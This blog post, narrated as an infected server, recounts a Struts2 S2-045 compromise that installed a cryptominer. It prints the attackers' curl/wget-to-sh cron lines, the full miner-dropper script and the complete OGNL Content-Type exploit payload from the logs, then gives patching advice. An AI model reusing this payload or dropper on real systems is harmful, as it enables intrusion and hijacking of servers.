我竟然被抓去做了比特币挖矿工

引言

世界上还是牛人多,在2011年的时候,一名大三的学生有了困扰,随后上知乎发布了一个提问大三学生手头有6000元,有什么好的理财投资建议?在2017年的今天,上到了知乎热门提问,因为在提问下面有一个获得上万点赞的回答买“比特币,保存好钱包文件,然后忘掉你有过6000元这回事,五年后再看看。

起因

我是一个服务器,并且还是一个内网的Linux服务器,外面武装了天清汉马防火墙,内部有firewall,强大的密码组合,甚至自己都记不清到底几位数,这几年我甚是悠闲,悠闲的感觉自己有点混日子,然就是这样一个与世无争的我还是被无情的攻击了。

那天清晨,感觉大脑有点发烧,赶紧发出一条top指令:

top - 20:07:49 up 70 days,  8:53,  2 users,  load average: 5.71, 5.07, 2.93
Tasks: 200 total,   1 running, 199 sleeping,   0 stopped,   0 zombie
%Cpu(s): 50.2 us,  0.1 sy,  0.0 ni, 49.7 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem : 65401524 total, 36266252 free, 13198040 used, 15937232 buff/cache
KiB Swap: 32834556 total, 32803700 free,    30856 used. 51442368 avail Mem
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
17257 root      20   0  591340  15220    556 S 599.7  0.0  67:13.74 atd
15768 root      20   0 15.369g 2.319g  18048 S   1.7  3.7   4:10.49 java

发现了一条诡异的进程atd,CPU占用居然将近600%,执行命令ps -eaf|grep atd:

[root@itstyle tmp]# ps -ef|grep atd
root     17257     1 99 19:56 ?        01:22:31 ./atd -c trtgsasefd.conf -t 6
root     17475 17165  0 20:10 pts/0    00:00:00 grep --color=auto atd

紧接着find / -name atd查找相关指令存放地点。

[root@itstyle tmp]# find / -name atd
/var/tmp/atd

突然觉得还是先把这个atd进程杀掉为好,kill -9 17257,立即马上迅速强行杀死。

随后退烧了,但可恶的是,不到几分钟,又烧了,一看又是atd这个进程在运行。

杀掉后重新运行,一定是在某个地方有定时,检查了一下定时任务,crontab -l:

[root@itstyle tmp]# crontab -l
/20    * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh
/19    * curl http://5.188.87.11/icons/logo.jpg|sh

擦,以前的定时脚本不见了,多了两条奇怪的任务,里面有个网址很特别,复制到浏览器访问,本以为是个美女或者惊悚图,结果是个大黑图,F12图片网络请求发现Response中居然存在如下代码:

#!/bin/sh
rm -rf /var/tmp/bmsnxvpggm.conf
ps auxf|grep -v grep|grep -v trtgsasefd|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "bmsnxvpggm"|awk '{print $2}'|xargs kill -9
ps -fe|grep -e "trtgsasefd" -e "ixcnkupikm" -e "jmzaazwiom" -e "erlimkvsmb" -e "pdnpiqlnaa" -e "zhoimvmfqo"|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /var/tmp/trtgsasefd.conf
rm -rf /var/tmp/trtgsasefd.conf
curl -o /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
wget -O /var/tmp/trtgsasefd.conf http://5.188.87.11/icons/kworker.conf
chmod 777 /var/tmp/atd
rm -rf /var/tmp/atd
rm -rf /var/tmp/sshd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /var/tmp/atd http://5.188.87.11/icons/kworker
wget -O /var/tmp/atd http://5.188.87.11/icons/kworker
else
curl -o /var/tmp/atd http://5.188.87.11/icons/kworker_na
wget -O /var/tmp/atd http://5.188.87.11/icons/kworker_na
fi
chmod +x /var/tmp/atd
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./atd -c trtgsasefd.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi

一坨脚本,狗日的 居然有 rm -rf 这是要要了老子的命啊!!! 吓大赶紧打开蓝灯谷歌搜索这个命令,在virustotal找到以下说明:

同时发现了一条四天前的评论,这是一个脚本,通过struts漏洞传播下载和启动一个bitcode矿工。

gov.lk中也发现了有一坨代码,隐约发现与struts2有关:

由于一些老旧项目还在使用struts2,于是查询了一下相关日志,居然发现了传说中的OGNL注入

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/form-data stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "/20     wget -O - -q http://91.230.47.40/icons/logo.jpg|sh\n/19     curl http://91.230.47.40/icons/logo.jpg|sh" | crontab -;wget -O - -q http://91.230.47.40/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

黑客攻击者通过使用一个表单来发送一些内容到struts请求,该内容被OGNL解析,结果创建了crontab,擦,真是耳闻不如一见啊,也有中招的那一天,就这样我变成了一个苦逼的挖矿工。

挖矿组织

Struts2的安全漏洞从2010年开始陆续被披露存在远程代码执行漏洞,从2010年的S2-005、S2-009、S2-013 S2-016、S2-019、S2-020、S2-032、S2-037、devMode、及2017年3月初Struts2披露的S045漏洞,每一次的漏洞爆发随后互联网都会出现Struts2扫描攻击活动。

此次攻击针对Struts2的远程命令执行漏洞,漏洞编号:S2-045,CVE编号:CVE-2017-5638,官方评级为高危,该漏洞是由于在使用基于Jakarta插件的文件上传功能条件下,恶意用户可以通过修改HTTP请求头中的Content-Type值来触发该漏洞,黑客通过批量对互联网的WEB应用服务器发起攻击,并下载恶意脚本执行下载进行比特币挖矿程序,主要感染Linux服务器。

经检测和搜索,这应该是一个有组织有纪律的挖矿集团,以下是IP地址来源,万恶的苏修主义啊,真是亡我天朝之心不死。

解决方案

  • Struts2升级版本至2.5.10,高危漏洞又来了,这是三月份的一篇升级,当时投机的还是赶紧升了吧,如果实在不想升级,无所谓反正是挖矿,不会破坏你什么。但是,如果不挖矿呢,那就傻逼了?到时候就不是发烧那么简单了,很多公司上线部署都不是很规范,可能所有的程序都用root启动也说不定呢?
  • 可以选用阿里云安骑士产品进行防御。安骑士是一款主机安全软件,通过安装在云服务器上轻量级的软件和云端安全中心的联动,为您提供漏洞管理、基线检查和入侵告警等功能。
  • 可以选用阿里云云盾WAF产品进行防御。Web应用防火墙(Web Application Firewall, 简称 WAF), 是阿里基于10余年攻防经验完全自主研发的安全产品。其基于云安全大数据能力实现,通过防御SQL注入、XSS跨站脚本、常见Web服务器插件漏洞、木马上传、非授权核心资源访问等OWASP常见攻击,过滤海量恶意访问,避免您的网站资产数据泄露,保障网站的安全与可用性。

如何注入

最后感觉这才是大家比较关注的问题,肯定有不少小伙伴想知道黑客是怎么注入的吧?

如果您要查看本帖隐藏内容请 回复

人们都说,只要心够诚,就能在西边疙瘩山上寻得一当铺,进去,便能改变你的一生,其实我也不知道。

作者: 小柒

出处: https://blog.52itstyle.com

分享是快乐的,也见证了个人成长历程,文章大多都是工作经验总结以及平时学习积累,基于自身认知不足之处在所难免,也请大家指正,共同进步。

本文版权归作者所有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出, 如有问题, 可邮件(345849402@qq.com)咨询。

时间: 2024-10-16 04:19:40

我竟然被抓去做了比特币挖矿工的相关文章

人人都说的比特币挖矿,到底是在挖什么?

比特币最迷人的地方就是挖矿了.为什么挖矿这么迷人?因为挖矿能获得比特币呗.我写这篇文章的时候比特币的价格是3900美元,如果能挖到一个区块,就能获得48750美元的挖矿收入和约6000美元的交易手续费收入,这不是非常迷人吗? 那么到底什么是挖矿呢?矿工又如何通过挖矿获得比特币的呢?这就需要从比特币区块链系统采用的PoW(工作量证明)共识机制说起了. PoW(工作量证明)共识机制 先讲一个故事: 有一个村子,这个村子里很多事情都需要大家一起决策.比如某天,村长需要全体村民一起决策今天中午村里的大食

草根APP如何掘金:从挖金矿转型做摆摊卖水

苹果移动终端目前推出的APP应用程序有100万个,经常应用的达到70多万个,每天的下载次数达到350亿次,而截止到2012年上半年,国内智能手机使用用户的数量达到2.9亿."也许您已经从这串数据中,读出了APP蕴藏的巨大商机和未来发展钱"景.但是,记者采访中发现,不少APP存在只赚吆喝不赚钱的现象.一方面收费APP很快会被越狱"成免费APP;而免费APP大多靠拉粉丝"赚人气,人气高的,能吸引风投,而人气不高的,就得面临市场的淘汰.怎样让手中的APP变成真金白银?来听

比特币、以太坊、区块链、代币、ICO,你需要知道的一切都在这了

雷锋网AI金融评论按:本文译自Hacker Noon,来源medium,作者为一名软件和系统工程师Preethi Kasireddy.雷锋网编译,转载请注明出处. 加密货币市场如火如荼-- 前段时间,比特币价格扶摇直上--不过,前两天,这个系统刚刚进行了硬分叉. 比特币价格近一年走势 以太币价格近一年走势 8种主要加密货币价格走势(包括比特币和以太币) --数百万美元的代币销售是常见的事情,新闻媒体头条讨论了关于以太坊,比特币,ICO,代币,硬分叉和其他技术主题. 我个人已经在这个领域投资了一段

疯狂的比特币,未来何去何从

除了疯狂,没有别的词能形容比特币,从2008年刚出来就备受关注,只是这个还要挂机烧显卡,我就没去搞了,早玩的一批确实不少发财的,而今天堪比黄金的价格则是没想到的.比特币对于网络世界和现实世界的影响有多大,未来会走向何方呢? 挖矿带来的比特币生态思考 比特币的金钱产生靠挖矿,在现实世界里就是矿工和煤老板,有钱的土豪一下子可以做比特币世界里的煤老板,而小玩家们苦逼地当着矿工.很多人买来不少专业挖矿机来玩,加速挖矿,早期的这拨人赚了,卖挖矿机的赚了,大多数小玩家是不舍得买好的挖矿机的.于是,一种奇特的

比特币,留一半清醒留一半醉

中介交易 SEO诊断 淘宝客 云主机 技术大厅 几个月前,笔者和一位朋友在一起喝茶时,聊到比特币.这位朋友目前是国内一著名军事网站的CEO,他问我了不了解比特币,有没有兴趣一起做一个比特币的交易网站.这位从事多年网站经营.具有丰富电商经验的朋友,一针见血地道出了看好比特币的理由:金融是离钱最近的行业,比特币将是未来全世界金融系统中一种重要的货币,投资与比特币相关的网站将会获得很好的收益. 我十分理解这位朋友的想法,也十分清楚多年来他在IT行业逐步发展的不易和艰辛.在互联网这个行业,无论是哪种商业

疯狂至颠:比特币的生态系统与逻辑黑洞

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 文/柳华芳 除了疯狂,没有别的词能形容比特币,从2008年刚出来时候我就关注过,只是这个还要挂机烧显卡,我就没去搞了,早玩的一批确实不少发财的,而今天堪比黄金的价格则是没想到的.比特币对于网络世界和现实世界的影响有多大,未来会走向何方呢? 挖矿带来的比特币生态思考 比特币的金钱产生靠挖矿,在现实世界里就是矿工和煤老板,有钱的土豪一下子可以做比

货币自治与庞氏骗局:一枚比特币的正反面

摘要: 由于近期比特币过山车一般的行情,引起了业界对于这一虚拟货币的强烈关注.在此之前,虎嗅网上的第一篇相关文章是比特币本月上涨152%,将成为全球经济最后的避险天堂? 这篇文章 由于近期比特币过山车一般的行情,引起了业界对于这一虚拟"货币"的强烈关注.在此之前,虎嗅网上的第一篇相关文章是"比特币本月上涨152%,将成为全球经济最后的避险天堂? "这篇文章发表于3月29日.10天过后,比特币狂跌,于是又有了这篇文章"暴涨后瞬间猛跌60%,比特币会成为另一场

石头SEO:做站到底有几多辛苦

各位好,在这里我要再次感谢A5站给我们草根站长链接交换提供了一个很好的平台.首先跟大家说下我昨天的经历吧,跟平时一样,昨天我来到bbs.admin5.com上收购链接,帖子刚刚发布出去不到10分钟了,就有不少人加我QQ.我发布的帖子是收高质量外链的,加我QQ的有高质量的链接也有垃圾链接,之后我们开始议价,当我还价的时候,对方竟然说你们做SF的一天就赚好几万,怎会在乎这点钱?我真是有苦说不出啊,我碰到这样的站长不止一个两三个了.难道真的像很多人想象那样,做SF发布站就真的是日进斗金吗?相信做SF发

注意:移动比特币钱包默认为比特币现金(BCC)

Bitcoin网站由Roger Ver拥有和运营的一个非官方的比特币新闻和信息网站,周一发布了其手机钱包的更新.包括在这个更新中的是对比特币现金的额外支持,这是一个比特币分支,声称能够实现Satoshi Nakamoto真正的加密货币愿景. 这一变化很快引起了比特币社区对reddit的关注,这并不是因为它包含了对比特币现金的支持,而是因为钱包也使得比特币现金成为默认的应用内加密货币. 现在,当用户下载应用程序时,它会自动创建比特币和比特币现金钱包.比特币现金钱包首先出现在名单上. 当用户点击"接